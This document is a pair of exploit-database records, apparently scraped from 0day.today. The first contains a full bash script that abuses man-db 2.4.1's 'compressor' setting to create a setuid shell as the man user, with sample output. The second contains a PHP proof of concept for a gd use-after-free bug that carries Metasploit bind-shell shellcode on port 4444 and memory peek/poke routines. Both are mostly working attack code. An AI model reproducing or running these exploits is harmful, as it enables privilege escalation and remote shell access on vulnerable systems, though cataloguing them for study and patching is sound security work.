{"type": "zdt", "lastseen": "2016-04-20T01:50:12", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "man-db 2.4.1 open_cat_stream() Local uid=man Exploit ", "published": "2003-08-06T00:00:00", "href": "http://0day.today/exploit/description/7311", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for linux platform in category local exploits", "hash": "e0cc581cccd11616ab7569c7d99da39015aa3b63c805acd62d4874f019eaa6e8", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "====================================================\r\nman-db 2.4.1 open_cat_stream() Local uid=man Exploit \r\n====================================================\r\n\r\n\r\n#!/bin/bash\r\n# xmandb.sh: shell command file.\r\n#\r\n# man-db[v2.4.1-]: local uid=man exploit.\r\n# by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\r\n#\r\n# open_cat_stream() privileged call exploit.\r\n#\r\n# i've been conversing with the new man-db maintainer, and after the\r\n# initial post sent to bugtraq(which i forgot to inform him), i sent him\r\n# an email highlighting another vulnerability i forgot to mention in the\r\n# original advisory.\r\n#\r\n# once he checked it out, he noticed that the routine never dropped\r\n# privileges before/after the potential buffer/elemental overflow occured,\r\n# and executed the (user defined) \"compressor\" binary. making it\r\n# pointless to exploit this via the overflow method, and all-purpose to\r\n# exploit this via the privileged execve() call method.\r\n#\r\n# best of luck to the new maintainer(Colin Watson<cjwatson debian org>),\r\n# he noticed it before i did, so he's on the right track. :)\r\n#\r\n# example:\r\n# [v9@localhost v9]$ id\r\n# uid=500(v9) gid=500(v9) groups=500(v9)\r\n# [v9@localhost v9]$ ./xmandb.sh\r\n# [*] making fake manpage directories/files...\r\n# [*] making runme, and mansh source files...\r\n# [*] compiling runme source...\r\n# [*] setting \"compressor\" to: /tmp/runme...\r\n# [*] executing man-db/man...\r\n# [*] cleaning up files...\r\n# [*] success, entering shell.\r\n# -rws--x--- 1 man v9 13963 Jun 13 20:09 /tmp/mansh\r\n# sh-2.04$ id\r\n# uid=15(man) gid=500(v9) groups=500(v9)\r\n# sh-2.04$ \r\n#\r\n# (tested on redhat7.1, from src, should work out of the box everywhere)\r\n\r\nMANBIN=/usr/bin/man\r\nMANDIR=man_x\r\nTMPDIR=/tmp\r\necho \"man-db[v2.4.1-]: local uid=man exploit.\"\r\necho -e \"by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\\n\"\r\nif [ ! \"`$MANBIN -V 2>/dev/null`\" ]\r\nthen\r\n echo \"[!] \\\"$MANBIN\\\" does not appear to be man-db, failed.\"\r\n exit\r\nfi\r\numask 002\r\ncd $TMPDIR\r\necho \"[*] making fake manpage directories/files...\"\r\nmkdir $MANDIR ${MANDIR}/man1 ${MANDIR}/cat1\r\ntouch ${MANDIR}/man1/x.1\r\necho \"[*] making runme, and mansh source files...\"\r\ncat <<EOF>runme.c\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\nint main(int argc,char **argv){\r\n setreuid(geteuid(),geteuid());\r\n system(\"cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh\");\r\n chmod(\"${TMPDIR}/mansh\",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);\r\n unlink(argv[0]);\r\n exit(0);\r\n}\r\nEOF\r\ncat <<EOF>mansh.c\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\nint main(){\r\n setreuid(geteuid(),geteuid());\r\n execl(\"/bin/sh\",\"sh\",0);\r\n exit(0);\r\n}\r\nEOF\r\necho \"[*] compiling runme source...\"\r\ncc runme.c -o runme\r\necho \"[*] setting \\\"compressor\\\" to: ${TMPDIR}/runme...\"\r\necho \"DEFINE compressor ${TMPDIR}/runme\">~/.manpath\r\necho \"[*] executing man-db/man...\"\r\n$MANBIN -M ${TMPDIR}/$MANDIR -P /bin/true x 1>/dev/null 2>&1\r\necho \"[*] cleaning up files...\"\r\nrm -rf $MANDIR mansh.c runme.c runme ~/.manpath\r\nif test -u \"${TMPDIR}/mansh\"\r\nthen\r\n echo \"[*] success, entering shell.\"\r\n ls -l ${TMPDIR}/mansh\r\n ${TMPDIR}/mansh\r\nelse\r\n echo \"[!] exploit failed.\"\r\n rm -rf ${TMPDIR}/mansh\r\nfi\r\nexit\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-7311", "sourceHref": "http://0day.today/exploit/7311", "modified": "2003-08-06T00:00:00", "reporter": "vade79", "enchantments": {"vulnersScore": 3.7}}

{"result": {"zdt": [{"lastseen": "2016-04-20T00:05:31", "references": [], "description": "Exploit for linux platform in category local exploits", "edition": 1, "reporter": "Stefan Esser", "published": "2007-03-20T00:00:00", "type": "zdt", "title": "PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit", "bulletinFamily": "exploit", "cvelist": [], "modified": "2007-03-20T00:00:00", "href": "http://0day.today/exploit/description/7656", "id": "1337DAY-ID-7656", "sourceData": "=================================================================\r\nPHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit\r\n=================================================================\r\n\r\n\r\n\r\n<?php\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP gd already freed resource usage exploit //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\n // This is meant as a protection against remote file inclusion.\r\n die(\"REMOVE THIS LINE\");\r\n\r\n // linux x86 bindshell on port 4444 from Metasploit\r\n $shellcode = \"\\x29\\xc9\\x83\\xe9\\xeb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x46\".\r\n \"\\x32\\x3c\\xe5\\x83\\xeb\\xfc\\xe2\\xf4\\x77\\xe9\\x6f\\xa6\\x15\\x58\\x3e\\x8f\".\r\n \"\\x20\\x6a\\xa5\\x6c\\xa7\\xff\\xbc\\x73\\x05\\x60\\x5a\\x8d\\x57\\x6e\\x5a\\xb6\".\r\n \"\\xcf\\xd3\\x56\\x83\\x1e\\x62\\x6d\\xb3\\xcf\\xd3\\xf1\\x65\\xf6\\x54\\xed\\x06\".\r\n \"\\x8b\\xb2\\x6e\\xb7\\x10\\x71\\xb5\\x04\\xf6\\x54\\xf1\\x65\\xd5\\x58\\x3e\\xbc\".\r\n \"\\xf6\\x0d\\xf1\\x65\\x0f\\x4b\\xc5\\x55\\x4d\\x60\\x54\\xca\\x69\\x41\\x54\\x8d\".\r\n \"\\x69\\x50\\x55\\x8b\\xcf\\xd1\\x6e\\xb6\\xcf\\xd3\\xf1\\x65\";\r\n\r\n // Offsets used for the overwrite (will be overwritten by findOffsets()\r\n $offset_1 = 0x55555555;\r\n $offset_2 = 0x66666666;\r\n \r\n findOffsets(); // Comment out if you want to just test the crash\r\n\r\n class dummyclass { }\r\n\r\n function myErrorHandler()\r\n {\r\n imagedestroy($GLOBALS['img']);\r\n \r\n // Clipping\r\n $GLOBALS['x'] = str_repeat(chr(0), 7311);\r\n $GLOBALS['x'][7310] = chr(0x00); \r\n $GLOBALS['x'][7309] = chr(0x01); \r\n $GLOBALS['x'][7308] = chr(0x00); \r\n\r\n $GLOBALS['x'][7307] = chr(0x7f); \r\n $GLOBALS['x'][7306] = chr(0xff); \r\n $GLOBALS['x'][7305] = chr(0xff); \r\n $GLOBALS['x'][7304] = chr(0xff); \r\n\r\n $GLOBALS['x'][7303] = chr(0); \r\n $GLOBALS['x'][7302] = chr(0); \r\n $GLOBALS['x'][7301] = chr(0); \r\n $GLOBALS['x'][7300] = chr(0); \r\n\r\n $GLOBALS['x'][7299] = chr(0x80); \r\n $GLOBALS['x'][7298] = chr(0); \r\n $GLOBALS['x'][7297] = chr(0); \r\n $GLOBALS['x'][7296] = chr(0); \r\n\r\n // True Color Image\r\n $GLOBALS['x'][0x1c38] = chr(1);\r\n // True Color Pixelmap (1st entry must be 0)\r\n $GLOBALS['x'][0x1c3c] = chr(0x08);\r\n $GLOBALS['x'][0x1c3d] = chr(0x80);\r\n $GLOBALS['x'][0x1c3e] = chr(0x04);\r\n $GLOBALS['x'][0x1c3f] = chr(0x08);\r\n\r\n return true;\r\n }\r\n \r\n function poke($addr, $value)\r\n {\r\n $GLOBALS['img'] = imagecreate(1, 1);\r\n imagesetpixel($GLOBALS['img'], $addr >> 2, new dummyclass(), $value);\r\n }\r\n \r\n function peek($addr)\r\n {\r\n $GLOBALS['img'] = imagecreate(1, 1);\r\n return imagecolorat($GLOBALS['img'], $addr >> 2, new dummyclass());\r\n }\r\n \r\n printf(\"Using offsets %08x and %08x\\n\", $offset_1, $offset_2);\r\n \r\n error_reporting(E_ALL);\r\n set_error_handler(\"myErrorHandler\");\r\n poke($offset_2, $offset_1);\r\n unset($d);\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n // This function uses the substr_compare() vulnerability\r\n // to get the offsets. \r\n \r\n function findOffsets()\r\n {\r\n global $offset_1, $offset_2, $shellcode;\r\n // We need to NOT clear these variables,\r\n // otherwise the heap is too segmented\r\n global $memdump, $d, $arr;\r\n \r\n $sizeofHashtable = 39;\r\n $maxlong = 0x7fffffff;\r\n\r\n // Signature of a big endian Hashtable of size 256 with 1 element\r\n $search = \"\\x00\\x01\\x00\\x00\\xff\\x00\\x00\\x00\\x01\\x00\\x00\\x00\";\r\n\r\n $memdump = str_repeat(\"A\", 18192);\r\n for ($i=0; $i<400; $i++) {\r\n\t $d[$i]=array();\r\n }\r\n unset($d[350]);\r\n $x = str_repeat(\"\\x01\", $sizeofHashtable);\r\n unset($d[351]);\r\n unset($d[352]);\r\n $arr = array();\r\n for ($i=0; $i<129; $i++) { $arr[$i] = 1; }\r\n $arr[$shellcode] = 1;\r\n for ($i=0; $i<129; $i++) { unset($arr[$i]); }\r\n\r\n // If the libc memcmp leaks the information use it\r\n // otherwise we only get a case insensitive memdump\r\n $b = substr_compare(chr(65),chr(0),0,1,false) != 65;\r\n\r\n for ($i=0; $i<18192; $i++) {\r\n $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);\r\n $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\r\n if ($y-$Y == 1 || $Y-$y==1){\r\n $y = chr($y);\r\n if ($b && strtoupper($y)!=$y) {\r\n if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {\r\n $y = strtoupper($y);\r\n }\r\n }\r\n $memdump[$i] = $y;\r\n } else {\r\n \t $y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\r\n $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);\r\n if ($y-$Y != 1 && $Y-$y!=1){\r\n\t $memdump[$i] = chr(1);\r\n } else {\r\n $memdump[$i] = chr(0);\r\n } \r\n }\r\n }\r\n \r\n // Search shellcode and hashtable and calculate memory address\r\n $pos_shellcode = strpos($memdump, $shellcode);\r\n $pos_hashtable = strpos($memdump, $search);\r\n \r\n if ($pos_shellcode == 0 || $pos_hashtable == 0) {\r\n die (\"Unable to find offsets\");\r\n }\r\n \r\n $addr = substr($memdump, $pos_hashtable+6*4, 4);\r\n $addr = unpack(\"L\", $addr);\r\n // Fill in both offsets \r\n $offset_1 = $addr[1] + 32;\r\n $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4;\r\n }\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/7656"}]}}